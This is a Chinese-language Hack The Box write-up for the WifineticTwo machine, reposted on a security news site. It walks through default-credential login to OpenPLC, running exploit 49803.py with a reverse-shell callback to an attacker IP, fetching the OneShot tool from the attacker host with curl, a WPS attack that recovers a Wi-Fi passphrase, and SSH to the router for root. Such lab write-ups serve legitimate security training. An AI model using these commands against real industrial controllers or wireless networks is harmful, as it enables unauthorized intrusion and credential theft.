HTB-WifineticTwo笔记

admin 2024年3月22日08:54:20评论91 views字数 1168阅读3分53秒阅读模式

HTB-WifineticTwo笔记

扫描靶机

nmap -sC -sV -T4 -Pn 10.129.130.13

HTB-WifineticTwo笔记

扫描到了8080端口,先看一下

HTB-WifineticTwo笔记

直接定向到了openPLC界面,这是一个openPLC系统,直接网上搜素默认密码尝试登陆

HTB-WifineticTwo笔记

成功登陆进去了

HTB-WifineticTwo笔记

然后搜索该系统的漏洞,直接在exploitdb搜索

HTB-WifineticTwo笔记

可以看到可以利用49803.py的poc脚本来进行,复制下来,然后修改一下内容,根据他的控制面板修改内容

HTB-WifineticTwo笔记

HTB-WifineticTwo笔记

现在可以直接运行命令

python3 49803.py -u http://wifinetictwo.htb:8080/ -l openplc -p openplc -i 10.10.14.6 -r 1234

HTB-WifineticTwo笔记

HTB-WifineticTwo笔记

还以为拿到了root flag,结果是user,猜测是在docker里面,查看ip的时候可以发现wlan0接口

HTB-WifineticTwo笔记

wlan0接口是WIFI接口,可以使用OneShot 工具测试该无线的wps漏洞

https://github.com/nikita-yfh/OneShot-C/tree/master

先上传到目标主机,使用curl命令下载文件(在arm架构下make出来的是无法运行的)

curl -O http://10.10.14.6/oneshot

HTB-WifineticTwo笔记

HTB-WifineticTwo笔记

然后使用该工具进行攻击

./oneshot -i wlan0 -K

HTB-WifineticTwo笔记

成功博捕捉到了密码NoWWEDoKnowWhaTisReal123!,前提是配置好无线服务https://wiki.somlabs.com/index.php/Connecting_to_WiFi_network_using_systemd_and_wpa-supplicant

HTB-WifineticTwo笔记

HTB-WifineticTwo笔记

配置完成后,重启服务

systemctl enable wpa_supplicant@wlan0.servicesystemctl restart systemd-networkd.servicesystemctl restart wpa_supplicant@wlan0.service

HTB-WifineticTwo笔记

然后查看一下wlan0端口,成功连接了其他网段

HTB-WifineticTwo笔记

直接使用ssh连接192.168.1.1,拿到root flag

HTB-WifineticTwo笔记

25-wlan.network

[Match]Name=wlan0[Network]DHCP=ipv4

wpa_supplicant-wlan0.conf

ctrl_interface=/var/run/wpa_supplicantctrl_interface_group=0update_config=1network={  ssid="plcrouter"  psk="NoWWEDoKnowWhaTisReal123!"  key_mgmt=WPA-PSK  proto=WPA2  pairwise=CCMP TKIP  group=CCMP TKIP  scan_ssid=1}

原文始发于微信公众号(Jiyou too beautiful):HTB-WifineticTwo笔记

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月22日08:54:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTB-WifineticTwo笔记http://cn-sec.com/archives/2593193.html

发表评论

匿名网友 填写信息